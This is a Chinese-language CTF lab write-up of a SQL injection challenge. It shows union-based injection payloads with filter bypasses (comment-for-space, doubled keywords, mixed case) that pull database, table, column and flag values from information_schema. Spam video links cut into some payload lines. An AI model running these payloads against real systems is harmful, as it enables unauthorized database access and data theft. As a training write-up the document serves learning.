技术心得:实验室每日一题WP

简介: 技术心得:实验室每日一题WP

"

打开题目,直接受到物理攻击。看到网页左下角提示

于是尝试sql注入,/?id=1;得到回显,/?id=//代码效果参考:https://v.youku.com/v_show/id_XNjQwNjgyMTc5Ng==.html

1' ;无回显,判断为数//代码效果参考: https://v.youku.com/v_show/id_XNjQwMDM2Mzg2MA==.html

字型注入。

当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。

当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

尝试查询字段数,经尝试过滤了空格 or ,于是用/**/代替空格 和双写绕过。

?id=1//oorderrder//by/**/1得到回显

测试为3个字段数,然后查询回显,发现select和union被过滤,发现双写绕过不行,于是尝试大小写绕过

?id=1//Union//Select/**/1,2,3

发现2,3为回显位,于是查询当前数据库名。

?id=1//Union//Select/**/1,2,database()

得到数据库名 text

查询表名

?id=1//Union//Select//1,2,group_concat(table_name)//frfromom//information_schema.tables//where/**/table_schema='text'

得到flag,users

获取列名

?id=1//uNion//Select//1,2,group_concat(column_name)//frfromom//information_schema.columns//where/**/table_name=%27flag%27

id,flag

查询字段值

?id=1//uNion//Select//1,2,flag//frfromom/**/flag

得到flag

flag{You have successfully!!!}

下次可以尝试直接爆破数据库密码了


"
image.png
相关文章
|
5月前
|
安全 网络安全
GitHub星标4000!清华大牛的CTF竞赛入门指南,真的太香了!
想进入网络安全行业、实现从学校到职场的跨越,参加CTF竞赛是很好的成长途径。 通俗而言,CTF是模拟“黑客”所使用的技术、工具、方法等手段发展出来的网络安全竞赛,有了手段之后需要的就是经验与黑客感(HackorFeel)。 CTF赛题涉及的领域很广,市面上也早有在知识广度上均有所覆盖的CTF书籍,但没有深入单一领域的内容,尤其是Pwn方向的。 Pwn是网络安全攻防最有魅力的部分,对于原教旨攻防人士来说,Pwm才是原汁原味的技术体现。二进制Pwn一直是CTF比赛的热点和难点。
|
8月前
|
网络安全
2024年---蓝桥杯网络安全赛道部分WP
2024年---蓝桥杯网络安全赛道部分WP
|
Python
第二届SWCTF部分WP1
第二届SWCTF部分WP
89 0
|
SQL 安全 PHP
第二届SWCTF部分WP3
第二届SWCTF部分WP
91 0
|
算法 数据安全/隐私保护 索引
第二届SWCTF部分WP2
第二届SWCTF部分WP
100 0
|
XML 数据格式
bugku-眼见非实-wp
bugku-眼见非实-wp
|
网络安全 开发工具 git
2021-07-27大连东软实训第八天---git学习
2021-07-27大连东软实训第八天---git学习
78 0
|
安全 Shell 网络安全
高校战“疫”网络安全分享赛-部分PWN题-wp
周末打了下 《高校战“疫”网络安全分享赛》,作为WEB转PWN的菜鸟,只做出了三个PWN, 虽然被大佬们暴捶,但还是学到了几个操作,这里写一份WP,记录一下。
高校战“疫”网络安全分享赛-部分PWN题-wp
聚变!牛客网开源1240页字节算法实录,无意中掀起GitHub刷题热潮
众所周知,字节跳动因为需要较高的推送准确率,所以对于数据结构与算法看得十分重要,放眼全球,字节跳动的数据结构与算法都可以说是“首屈一指”的,可以称得上是最锋利的“矛”,更有甚者说掌握了字节的算法,基本上半个身子就算是进了大厂了,所以算法刷一份字节跳动的算法,还是很有必要的。 应众粉丝要求,凯撒可以说是“跑断了腿,求没了人,熬坏了眼”,终于是搞出了一份相当全面的《字节千题算法实录》,共十四部分,今天免费分享给大家,以感谢大家一直以来对我的支持,一起看下:

热门文章

最新文章